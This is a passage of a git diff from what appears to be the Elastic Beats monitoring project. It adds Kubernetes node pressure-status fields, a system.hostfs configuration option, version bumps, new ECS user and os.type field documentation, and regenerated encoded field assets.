oR4RkW45zVJFwkw0NJeawaGRWlgw13nEih44LNQPh6odhZJ7Bjh3rcEsmJedqHFuuuyu6ych2JwNcndEtLykldBt1qdKNn4metNS3UQ3kzyqDTNJVpfcoI3mX9K+tKRCWGsUKj8uUyBU8ugwxF17LQ1qevb0VIAdFDdKImI3IIXg311CJCV22x2Fot5UXZYtDryzXkuT2VG6K5fAXEwmbWyUQjQQa6ZXgWXwqQ3n9BZUCb8GiCFezTSr6u85+aCPkk9prJOM2wdPCpwBMEMugPIRxLmubz4SGzc9l63ZK75eMQ618iqlzyurxxZQpxbhoB1AOpFs5BqQTkC0xlsKqsM5LHS+R4AzS9SZj2PWHzbKjXunEaIPSLxYINzLVv9lGp4YkkzjT3BHOMpZgie8zUN/zNjYjOZHfXmtT2BAKaUW/zcB3Q+EH9ROnRhDZoJLq70Jq38TL2DY8hzzRql/YVoXiGzZzQMKPmGTY7v7LByXXahiF9b2pRTUKt7bWT9tYlOACJ0TuVQBsl96Oq/VfvgX9VN4crhs14L0FveiBPVwtRI0H7j2LZbO8PY5HUSezO+0HXW9xNsjYFOHgDz/i8VJQIZQc3nkMStpBLJT6e1rRUklvZdAe+uHExtzxguuXppJKEc4Gv/A481eD/cxQ0+EB6MVHmyFtXhBw1g7hjjlNDfHR0QX0ynrJze2tv480lJ8YfyB0K8CdHHsdGvmjaigSIMM0U+AtbHCZWRKM83aw7Zy6jJYCQg6kdv7EfzF+MkYazcmr7UWMyU3EM0BvY51xw5jU51zEXkjIZy853kroY9eTGZKf12Z2HdWx+POt0U6y7vhiWXGY2X/Osgx4dUFi0S7AZSusvm4RZw/gWY6pnvLk+qmPwp74CKz6bzy4zziHsJPW/2I0Iu4V3XAsJC8TWXIYCz8f+K2acz7wez7wez7wG9CM84FfO5Hzgd9gjucDv+cDv+cDv8sP/FqizLlHgJ8Yf/i7hNIecR4y9SnSoALO6lje8un8l0pge/6unsx9sURJN4QSsYsSTnxphYVA4zSN4cN/NHZRAiccOYVC7qJiaomT3UdyEqW/drjmKWct3b4wYymsErVgTySzr68PcVx4JImOJGLGwHobo5Hsc9gd4EzuYpwd78BbqcieCjrGuX0/UsXHsXUVDnfd21hyN7IdkwCnwFdErHMspCMnc89YBngY6E1dbN91N9u1rYlAA4x3Qzb6ROu7IfyMhNXdDszyHNUJ2SZnBWoe0n2j/Y3cYYkwB7QFChzLqp5Ic564Hld7CISqha1S7s/D6iZoRjLM7WAOW3u1fVlNrwoFcUgYT0Wl99b5JMmh+lmBuSRJmWFeKQHtsEAs0YfUUwtD/U2J88LCcjyY+NJ+G8KFXNdQ1FHTY/4B4LuGoGqnxkAdhvrZ0KvMCyFHJ6QgJvh0uRAx2pWrOEj4KsO94ddKTu0JkHYFBMgjUIs6Elbs15LZGHRzGhaDpZ479eZld6MlhZJrvXBYmONA9Lt90W65+xEteUiX0/sR9TZ+U9uCQ8G4rIpbEGGxha8DHbXqxoazHD3tSLLTyqnGBiK6kdGeG4qaef6s5gklGDEaysXIueMUS7zcYr/WkhAWgiVEzwpPRO68fchnN/sQOj8ia/2Aw8ggyDdgBews9QYtDUAY9feUjlBjl3XcnYH/rsXWLrHpnMEe/cbflgjC1EWb4gJrkYg0naDqAE94qjc2uyfr6LVofq9r0ZgK8W/WlCTiBtgXSv4uAektBbIhKqxkBhFLSqkdxiHbrDNCHyKSuflFjeMchGJT1ylyTSOEPrLsEdK1heOxRqcG06YX3ziFCxLfc364vmorGdXe4zFX3JJWCvuhLms1ARx38DAHLA/o8fprI3mG6uN22C9XnyawzaTFkjWfcVVRrzPPtxTPtxQdn/i3FHXE+q1fUDzfVLD/zfmmwugT76bC+UD6iPL5QLqL+vlA+sSBdApSeU+0sZt/feUueAMJkEed73fJanclOLftawazDmX01YXU5pFeu1HuOKYiJ1K+JLvcWe3Sbmqcb4E0n0B9/nS+ADJbRee7H+ZnpJ63ce3DOL7guHI+pHWaigEdr5dSK6Bj5KoX0MY5JXVmeQ4Zw0mu4sIj1X9wzw/TAFMgKLCno/A0SkiPR/PSLVe5joPnzyAocBZBb1uRAfMMmjPsvUkl2mejdinbu8O1JNtdsPSbTHaf16rN57xWNT/fllG+wbXqm9hlejG7KiNiL7Ecz5yyj2+q1KOaXNvqO2JYfqeu8cgoIMZRzjiYf1wLViIwh6lKkJF33c7bSyPiL7LnnQthxeuOB1fDeisJxV6HcTd6sBG5fv07kZVinkb7ke7Fxqvfrq5U0hZwUDrRN1cnFFPgLayPuCNa0Qren12fho97d9YoH/J1v2TFb9xn0rKWPzjcHt63lMs5+FaHqwJPl4tOo9zgsFXeMe4ADEvkLEEZiXPeeliqtb48w3VGlWfmXLzqrfys93293SCw3kw/jp2qNuO5yugfww6pMzOg5q8yE5mZt75Muxviry7jobSgskwv7+e4CB7uGHNqyrT9Z1hR5jCvnl1LxluAIqSOTJQqMj76tpoQsRh5S0/4SC1zzuDKMUMKoYVFwq0aTnaiooiHqtuCS4eW8EoxHnqxbWmpEWPcbphXISauIcNqw/jIHtOUwTVhfASXGtNTDWboQhH9xhYcThV+OeRWfGDJl3Y63NMkaFLygj6U91CF6XWwvqeJNUc+MbWVGYjAmWFa/bd7mlwrOjdK7OAZQLZpfzD1oKOb3TL3cPILeBrQzcn5PGDMccZJfep9wMFuaMH1H+eEbqOZ/XMlGhmyZz0BGUhxYezqJTnDASZYnsQb/I1xu8QoayCSHaRltqx8r5E5aOWd0wZjjFeWNhhdZT0QZqowrxGZlFmUht3WXoqwlJAXciy6wWxHg4iwqrPa5J7TMed0zBSlczrmnI6ZyeicjjmnY87pmHM65pyOsXLwVqas8G11Kb0U5tSkHK3FhpUgD5sk4d/h9MvSf9AUSYaApkZj7NNSIO0laYkZbDwdcMhoWY+wc/L1xIKlq4KDWqYoBrqQbT5pz2km1yxFnVxUy51HYol17PgeQzg4LLOHg8WUQep1Ywz0RpQXs3XA2l9PGe/eWvrO9MQ6YrwsxLWRCJo/RzwWZpBdnfbdELg9RfhuiHLYLZzuic4Yd3EOrsE1Us9ly4vYiwUKiWUZ7/Z6scPCfYzS3oBhI3zHuNvmaCD0oS7OfIGeMJH6fyTwnFDsf/4UcOq+YG8vdB3IsmOoQez67QWQakHuPpxGqITtqCL3AWQqnMmi9aMCvyaZRfb7o7IQ+tCyutQFRpXRLjkWu18YK37EyQPbbC7QPzjXF+uuyyy7QO3/1r8fm1Z9GG+tr0agD5csLzKQkF50mrjElDJ5U1INwfgF+u23X38mWQbpd3XzV9aOMufazOQbEPpctuuySCXXdRx7ltkvr7/ogmuigvTYvYnxT0KphoMU2QH7evJdrPHMDIpXwSFRQ8FH9J+r/4jBvOUSqFAf92l6E607WOsnLQBXGfH4b7pNqaA+917dKJgsE9EY8Pl5d2ZrLjW4LhUnnNG/2H2skKaSFiWgGW1GhYc06LLmMZIx3CVdCmCVYwSMdfV+e88IwelEoIJlZCCpvY2SqKB5wbNHXYqlEqXWRKJ7TH7kJEbcKdaiFAXQdHSj3xca9dDN7ErjQkStHG1yO8/Vtcwtux6eRUh/6V6wZIfEaN+jofCEhbViejtKYSHXjQdE46GUrt9+aGjwkto7CHw9ErySPAmfAk4zQt3IUz73qRbQQuONBN52Kc0kYfrVFK6CwA0mmWGJkP/x/9O91Esx5Iz2LzEtOUTxScu71ZeETjwydpNTkZEEhy/bJiYca+tqkAOvdk/fqTs8rLnrPWrTVStp1IIK4F1DnBRTEIR7ymQtI1hL773ZNYuef5EaS3vVKnUmtZKezrwG1hTNzrBFxvb5wlekjFCoExilzxfYUjIneIL1dl+DaYViS0CcYBgxeLRGI3TDZo4iU110UXbkU8exc7em27asP4gCkiV3h2NxHHeDRf0zFi1b/3QTK1LrmzXRSVU4Y0JmMYBIg0PM5wZipmL988eiVJ6ud2/mN9EHyUu4QBucCV0Mo6QPlD1Rd78paR0bep10USpWs+zhTGVjqwX2uuAgRGl9piAWraoGwnUNNMUrJeLhFKw+EfEQyomVcs02a0XtiIx+K+VvG0Vrik5B0lNo6Prqk09Bx0gWG2UtjpefbV+wMIto+JOzTbnFCVKHx4Etp7aw4+kerTB0/lwZwM+umiZTqcvWMM/KvGbrL8pp7NofxXa6OsyxXNO0TcEsz7yMDHJUOro4zrA4bKtg4IIICVQ+sqzMY8U+nVhUyW0CoeohSfWX36thEr5/7izy7xU9JcKxv+frNWFJsBrDWqHXt0E+txHV3jdOEsZT/fIcM2ziCC0Zx1tYJxkeVa4JRr+thCAtpM0nj/wJhWTpXH6ZZJjkR3POJMMv2EWvf7/0+GfVhEVva/5IaAppoww3VL3jtK69ZkGPuOk2epvuFb9XKL1pAXbZOElAiHU+vEI2A+EHLQIpEXaMI/av698vV67uZJ8+F/WZSNWEif2V29GPwzNKitnVtRVsx4RcHwdRiXbBzlyvzwOu19WHJd+PeAprQLM+hnXTHMO6BqqmpNVqdejpq5jslqUoms0rd7oqJtcWzcb3Ysx2mMRdtr9lDAHNvo+ItMN1xCyzSdWd7n5Jm1W9HYyb6h/Pt0d1OK9n25wK4MbudW28YymtfnxbP2lbI6H7vZ6rO3L6QDBn2fCGPOodObgH3+gSS4ubMsv2DdqkNo2Tqfqq998l6z2nv2xoMWRGGVyOd3Dkpub6P5rr1PGRoZbmMKgQCN0wnkOKPuwwT/UEJSD9znf1Ps6yo99Q5ykrJe9QCLOFVc9RX71Af6qm/qna+qdq7J+O+cPS8APap8VpVVbuh4siIyCQZOPlqf+f7uWsGg5IEiu7Ukt79hN4tzUPT/IkK4UE7grCAzCuqAROcYaurluXr9tvh4Sv1RcWrYibljXC0KfPt+4u0EIe3swRoGNtkTGcru9xhmmySK2/MJyiH2s5rUM5QJd08aZhIxntipBuuVqHL3ERLcHFvgFQS7YlPtHA/NMmZzDv2Ef8iadyGlVpGWow7H3BXF3CpsziBfaNxGiRvU8JU5mhceBytzNUIkkOQuK8QB9ATdDVPHhbt2AY/Z1gqdFTXhtDHbTaOHJ8ahTLasLTXsznUiJ6hmXH6LSNj2BDrgvAj21nI9Q3gpeXZe7WyAbZl2HmxrgBxAZ51GEaddmoZ2ZVnz2U6rFxB1QFZ49EEEZH68fZm0WdpC6wMlm49gD0VszaclFhVuytpdTXHao6M3uKc5JgtSatJ5B6R8K+dVXve9wTnVhclMb/laXVSfS0erS90w2hW4RpimqU+FN+z+wTE79+RTCW91dPEhqPpkSZ+C23p2dZwvKUWHvfyX3P58QvFL6Jh9ISZj0vNS18CsAEGVXrHMNMvtwZeEMc1dq+ZBxqlVNMHXVNBixfyptxRzrUdH4TrEf69b/hc3N7G6aK+uWj1//Q0x+jJ54mNFPgLRzx+aDuqmbwk0YnYzT9qFHUo2T982PPFqCPtWKcHLOijd55P3yE9rzt/pp64U/zX24P36l9pSoKeJO9m+c9S/pXqh77a+u2Rry01zCve29f1mcY9GrRaWBCWeo52L3ExJNv+ccIf79UxnI0whhZOfjXJjHI/MQBQsjYCyfFZlPFrzWd/w8AAP//Nny2cA==" } diff --git a/metricbeat/module/kubernetes/state_node/_meta/fields.yml b/metricbeat/module/kubernetes/state_node/_meta/fields.yml index ea0f952089ee..b7d5f2a19209 100644 --- a/metricbeat/module/kubernetes/state_node/_meta/fields.yml +++ b/metricbeat/module/kubernetes/state_node/_meta/fields.yml @@ -15,6 +15,22 @@ type: boolean description: > Node unschedulable status + - name: memory_pressure + type: boolean + description: > + Node MemoryPressure status + - name: disk_pressure + type: boolean + description: > + Node DiskPressure status + - name: out_of_disk + type: boolean + description: > + Node OutOfDisk status + - name: pid_pressure + type: boolean + description: > + Node PIDPressure status - name: cpu type: group fields: diff --git a/metricbeat/module/kubernetes/state_node/_meta/test/ksm.v1.3.0.expected b/metricbeat/module/kubernetes/state_node/_meta/test/ksm.v1.3.0.expected index c560b169d770..38a0cc0dae10 100644 --- a/metricbeat/module/kubernetes/state_node/_meta/test/ksm.v1.3.0.expected +++ b/metricbeat/module/kubernetes/state_node/_meta/test/ksm.v1.3.0.expected @@ -29,6 +29,9 @@ } }, "status": { + "disk_pressure": "false", + "memory_pressure": "false", + "out_of_disk": "false", "ready": "true", "unschedulable": false } diff --git a/metricbeat/module/kubernetes/state_node/_meta/test/ksm.v1.8.0.expected b/metricbeat/module/kubernetes/state_node/_meta/test/ksm.v1.8.0.expected index 7b0390a04a26..371c9ca294bd 100644 --- a/metricbeat/module/kubernetes/state_node/_meta/test/ksm.v1.8.0.expected +++ b/metricbeat/module/kubernetes/state_node/_meta/test/ksm.v1.8.0.expected @@ -29,6 +29,9 @@ } }, "status": { + "disk_pressure": "false", + "memory_pressure": "false", + "pid_pressure": "false", "ready": "true", "unschedulable": false } diff --git a/metricbeat/module/kubernetes/state_node/state_node.go b/metricbeat/module/kubernetes/state_node/state_node.go index bd3349152402..f2a1a6b965e6 100644 --- a/metricbeat/module/kubernetes/state_node/state_node.go +++ b/metricbeat/module/kubernetes/state_node/state_node.go @@ -49,12 +49,16 @@ var ( "kube_node_status_allocatable_cpu_cores": p.Metric("cpu.allocatable.cores"), "kube_node_spec_unschedulable": p.BooleanMetric("status.unschedulable"), "kube_node_status_ready": p.LabelMetric("status.ready", "condition"), - "kube_node_status_condition": p.LabelMetric("status.ready", "status", - p.OpFilter(map[string]string{ - "condition": "Ready", - })), + "kube_node_status_condition": p.LabelMetric("status", "status", p.OpFilterMap( + "condition", map[string]string{ + "Ready": "ready", + "MemoryPressure": "memory_pressure", + "DiskPressure": "disk_pressure", + "OutOfDisk": "out_of_disk", + "PIDPressure": "pid_pressure", + }, + )), }, - Labels: map[string]p.LabelMap{ "node": p.KeyLabel("name"), }, diff --git a/metricbeat/module/system/_meta/config.reference.yml b/metricbeat/module/system/_meta/config.reference.yml index 39438686dbde..929f585e7d92 100644 --- a/metricbeat/module/system/_meta/config.reference.yml +++ b/metricbeat/module/system/_meta/config.reference.yml @@ -19,6 +19,9 @@ period: 10s processes: ['.*'] + # Configure the mount point of the host’s filesystem for use in monitoring a host from within a container + #system.hostfs: "/hostfs" + # Configure the metric types that are included by these metricsets. cpu.metrics: ["percentages","normalized_percentages"] # The other available option is ticks. core.metrics: ["percentages"] # The other available option is ticks. diff --git a/metricbeat/module/system/_meta/config.yml b/metricbeat/module/system/_meta/config.yml index 6fe064892172..3f22bc5a4967 100644 --- a/metricbeat/module/system/_meta/config.yml +++ b/metricbeat/module/system/_meta/config.yml @@ -17,6 +17,8 @@ process.include_top_n: by_cpu: 5 # include top 5 processes by CPU by_memory: 5 # include top 5 processes by memory + # Configure the mount point of the host’s filesystem for use in monitoring a host from within a container + #system.hostfs: "/hostfs" - module: system period: 1m diff --git a/metricbeat/module/system/system.go b/metricbeat/module/system/system.go index 0efba5c0f16e..a6af865ca49d 100644 --- a/metricbeat/module/system/system.go +++ b/metricbeat/module/system/system.go @@ -22,10 +22,12 @@ import ( "sync" "github.com/elastic/beats/v7/libbeat/common/fleetmode" + "github.com/elastic/beats/v7/libbeat/logp" "github.com/elastic/beats/v7/metricbeat/mb" ) var ( + // TODO: remove this flag in 8.0 since it should be replaced by system.hostfs configuration option (config.HostFS) // HostFS is an alternate mountpoint for the filesytem root, for when metricbeat is running inside a container. HostFS = flag.String("system.hostfs", "", "mountpoint of the host's filesystem for use in monitoring a host from within a container") ) @@ -39,6 +41,11 @@ func init() { } } +// Config for the system module. +type Config struct { + HostFS string `config:"system.hostfs"` // Specifies the mount point of the host’s filesystem for use in monitoring a host from within a container. +} + // Module represents the system module type Module struct { mb.BaseModule @@ -48,10 +55,25 @@ type Module struct { // NewModule instatiates the system module func NewModule(base mb.BaseModule) (mb.Module, error) { + + config := Config{ + HostFS: "", + } + err := base.UnpackConfig(&config) + if err != nil { + return nil, err + } + if *HostFS != "" { + if config.HostFS != "" { + logp.Warn("-system.hostfs flag is set and will override configuration setting") + } + config.HostFS = *HostFS + } + // This only needs to be configured once for all system modules. once.Do(func() { - initModule() + initModule(config) }) - return &Module{BaseModule: base, HostFS: *HostFS, IsAgent: fleetmode.Enabled()}, nil + return &Module{BaseModule: base, HostFS: config.HostFS, IsAgent: fleetmode.Enabled()}, nil } diff --git a/metricbeat/module/system/system_linux.go b/metricbeat/module/system/system_linux.go index 72477566a93c..6f3f15a1135c 100644 --- a/metricbeat/module/system/system_linux.go +++ b/metricbeat/module/system/system_linux.go @@ -24,12 +24,12 @@ import ( "github.com/elastic/gosigar" ) -func initModule() { - configureHostFS() +func initModule(config Config) { + configureHostFS(config) } -func configureHostFS() { - dir := *HostFS +func configureHostFS(config Config) { + dir := config.HostFS if dir == "" { dir = "/" } diff --git a/metricbeat/module/system/system_other.go b/metricbeat/module/system/system_other.go index 8d89efbd485e..c526d363b282 100644 --- a/metricbeat/module/system/system_other.go +++ b/metricbeat/module/system/system_other.go @@ -19,6 +19,6 @@ package system -func initModule() { +func initModule(config Config) { // Stub method for non-linux. } diff --git a/metricbeat/module/system/system_windows.go b/metricbeat/module/system/system_windows.go index 154481eb657e..1c95b3e92f96 100644 --- a/metricbeat/module/system/system_windows.go +++ b/metricbeat/module/system/system_windows.go @@ -22,7 +22,7 @@ import ( "github.com/elastic/beats/v7/metricbeat/helper" ) -func initModule() { +func initModule(config Config) { if err := helper.CheckAndEnableSeDebugPrivilege(); err != nil { logp.Warn("%v", err) } diff --git a/metricbeat/modules.d/system.yml b/metricbeat/modules.d/system.yml index cf433cde96e0..625e000bd5e9 100644 --- a/metricbeat/modules.d/system.yml +++ b/metricbeat/modules.d/system.yml @@ -20,6 +20,8 @@ process.include_top_n: by_cpu: 5 # include top 5 processes by CPU by_memory: 5 # include top 5 processes by memory + # Configure the mount point of the host’s filesystem for use in monitoring a host from within a container + #system.hostfs: "/hostfs" - module: system period: 1m diff --git a/packetbeat/Dockerfile b/packetbeat/Dockerfile index 6c5abe6309a8..f48ccaadd290 100644 --- a/packetbeat/Dockerfile +++ b/packetbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.7 +FROM golang:1.15.8 RUN \ apt-get update \ diff --git a/packetbeat/Jenkinsfile.yml b/packetbeat/Jenkinsfile.yml index 0225058ab1c7..3205b791b791 100644 --- a/packetbeat/Jenkinsfile.yml +++ b/packetbeat/Jenkinsfile.yml @@ -81,3 +81,7 @@ stages: mage: "mage build unitTest" platforms: ## override default labels in this specific stage. - "windows-7-32-bit" + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/packetbeat/cmd/root.go b/packetbeat/cmd/root.go index f05e2bb9d367..e2fbb373d2f0 100644 --- a/packetbeat/cmd/root.go +++ b/packetbeat/cmd/root.go @@ -37,7 +37,7 @@ const ( Name = "packetbeat" // ecsVersion specifies the version of ECS that Packetbeat is implementing. - ecsVersion = "1.7.0" + ecsVersion = "1.8.0" ) // withECSVersion is a modifier that adds ecs.version to events. diff --git a/packetbeat/docs/fields.asciidoc b/packetbeat/docs/fields.asciidoc index d024fa12917b..3475f2c6e91e 100644 --- a/packetbeat/docs/fields.asciidoc +++ b/packetbeat/docs/fields.asciidoc @@ -3952,7 +3952,7 @@ example: apache + -- Raw text message of entire event. Used to demonstrate log integrity. -This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. +This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, consider using the wildcard data type. type: keyword @@ -4005,7 +4005,7 @@ example: Terminated an unexpected process + -- Reference URL linking to additional information about this event. -This URL links to a static definition of the this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. +This URL links to a static definition of this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. type: keyword @@ -5196,6 +5196,19 @@ example: darwin -- +*`host.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`host.os.version`*:: + -- @@ -6270,6 +6283,19 @@ example: darwin -- +*`observer.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`observer.os.version`*:: + -- @@ -6440,6 +6466,19 @@ example: darwin -- +*`os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`os.version`*:: + -- @@ -9591,6 +9630,7 @@ URL fields provide support for complete or partial URLs, and supports the breaki -- Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. +If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. type: keyword @@ -9766,6 +9806,119 @@ The user fields describe information about the user that is relevant to the even Fields can have one entry or multiple entries. If a user has more than one id, provide an array that includes all of them. +*`user.changes.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.changes.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.changes.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.changes.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.changes.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.changes.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.changes.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.changes.name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.domain`*:: + -- @@ -9776,6 +9929,119 @@ type: keyword -- +*`user.effective.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.effective.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.effective.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.effective.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.effective.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.effective.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.effective.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.effective.name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.email`*:: + -- @@ -9879,6 +10145,119 @@ example: ["kibana_admin", "reporting_user"] -- +*`user.target.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.target.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.target.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.target.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.target.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.target.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.target.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.target.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.target.name.text`*:: ++ +-- +type: text + +-- + +*`user.target.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + [float] === user_agent @@ -9995,6 +10374,19 @@ example: darwin -- +*`user_agent.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`user_agent.os.version`*:: + -- diff --git a/packetbeat/include/fields.go b/packetbeat/include/fields.go index 1f2b1015f554..323eff798ee7 100644 --- a/packetbeat/include/fields.go +++ b/packetbeat/include/fields.go @@ -32,5 +32,5 @@ func init() { // AssetFieldsYml returns asset data. // This is the base64 encoded gzipped contents of fields.yml. func AssetFieldsYml() string { - return "eJzs/XtzGzmSKIr/358CP23ET/YsVSL1sqx7J+KoJXW3Yv3QWPL0To83JLAKJDGqAqoBlGj2if3uN5AJoFAPSZQt2m6P5px1i2QVkEgk8oV8/Af59fDdm9M3P///yLEkQhrCMm6ImXFNJjxnJOOKpSZfDAg3ZE41mTLBFDUsI+MFMTNGTo7OSankv1hqBj/8BxlTzTIiBXx/w5TmUpBR8iIZJj/8BznLGdWM3HDNDZkZU+qDzc0pN7NqnKSy2GQ51YanmyzVxEiiq+mUaUPSGRVTBl/ZYSec5ZlOfvhhg1yzxQFhqf6BEMNNzg7sAz8QkjGdKl4aLgV8RX5y7xD39sEPhGwQQQt2QNb/j+EF04YW5foPhBCSsxuWH5BUKgafFfu94oplB8SoCr8yi5IdkIwa/NiYb/2YGrZpxyTzGROAJnbDhCFS8SkXFn3JD/AeIRcW11zDQ1l4j300iqYWzRMli3qEgZ2YpzTPF0SxUjHNhOFiChO5EevpejdMy0qlLMx/OolewN/IjGoipIc2JwE9AySNG5pXDIAOwJSyrHI7jRvWTTbhSht4vwWWYinjNzVUJS9ZzkUN1zuHc9wvMpGK0DzHEXSC+8Q+0qK0m76+NRztbQx3N7a2L4b7B8Pdg+2dZH93+7f1aJtzOma57t1g3E05tlQMX+Cfl/j9NVvMpcp6Nvqo0kYW9oFNxElJudJhDUdUkDEjlT0SRhKaZaRghhIuJlIV1A5iv3drIuczWeUZHMNUCkO5IIJpu3UIDpCv/d9hnuMeaEIVI9pIiyiqPaQBgBOPoKtMptdMXREqMnJ1va+vHDo6mPy/a7Qsc54CdGsHZG0i5caYqrUBWWPixn5TKplVKfz+vzGCC6Y1nbI7MGzYR9ODxp+kIrmcOkQAPbix3O47dOBP9kn384DI0vCC/xHoztLJDWdzeya4IBSetl8wFbBip9NGVampLN5yOdVkzs1MVoZQUZN9A4YBkWbGlGMfJMWtTaVIqWEionwjLRAFoWRWFVRsKEYzOs4Z0VVRULUgMjpx8TEsqtzwMg9r14R95Noe+Rlb1BMWYy5YRrgwkkgRnm5v5C8szyX5Vao8i7bI0OldJyCmdD4VUrFLOpY37ICMhls73Z17xbWx63Hv6UDqhk4Jo+nMr7JJY/+MSQjpamvtf2JSolMmkFIcWz8MX0yVrMoDstVDRxczhm+GXXLHyDFXSujYbjKywYmZ29NjGaixAm7itoKKhcU5tacwz+25G5CMGfxDKiLHmqkbuz1IrtKS2UzanZKKGHrNNCkY1ZVihX3ADRsea59OTbhI8ypj5EdGLR+AtWpS0AWhuZZEVcK+7eZVOgGJBgtN/uKW6obUM8skx6zmx0DZFn7Kc+1pD5GkKiHsOZGIIAtbtD7lhpzPmIq594yWJbMUaBcLJzUsFTi7RYBw1DiR0ghp7J77xR6QU5wutZqAnOCi4dzagzio4UssKRCniYwZNUl0fg/PXoNO4iRnc0Fux2lZbtql8JQlpKaNmPtmknnUAdsFRYPwCVIL18TKV2JmSlbTGfm9YpUdXy+0YYUmOb9m5L/o5JoOyDuWcaSPUsmUac3F1G+Ke1xX6cxy6Vdyqg3VM4LrIOeAbocyPIhA5IjCoK7Up2Nc8TxLPJ9ys7RPdN+ZvvVUt0/SyUfDRGbFs52qgbKJ23fcI0/LTpFBdm01GuEGMDKcQioWPePBSaOIcNQ/wpD2BJRK3vCMDaxCokuW8glPCb4Nig/XQT1zGIw4TcGM4qmlnaCLvkj2kiF5Rotsb+f5gOR8DD/j1//co1vbbH+yP9keTnaHw9GYbu/ssB22u5PtZy/T8f5WOh4NX6QBRLseQ7aGW8ON4dbGcJdsbR+MhgejIfnP4XA4JO8vjv4nYHhCq9xcAo4OyITmmjW2lZUzVjBF80ueNTeVue14hI31cxCeWc434UwhV+DanY9nfAKCBaSPft7eYm41FFWA1ucVc5oqqe1GaEOVZZPjypArpBCeXcExswesu0P7dMcietJARHv5j0PT7wX/3aqtD193UKMs50F+Be/NQV8bMwLcifcQoFte1lie/XcVC3TaKLDNmNF3dlATik+hlEPNYspvGKijVLjX8Gn384zl5aTKLW+0HMCtMAxs5pL85Pg04UIbKlKnnrbEjLYTg6yxROK0JFJrSaykCjhDGJtrIhjL0K6cz3g6604VGHYqCz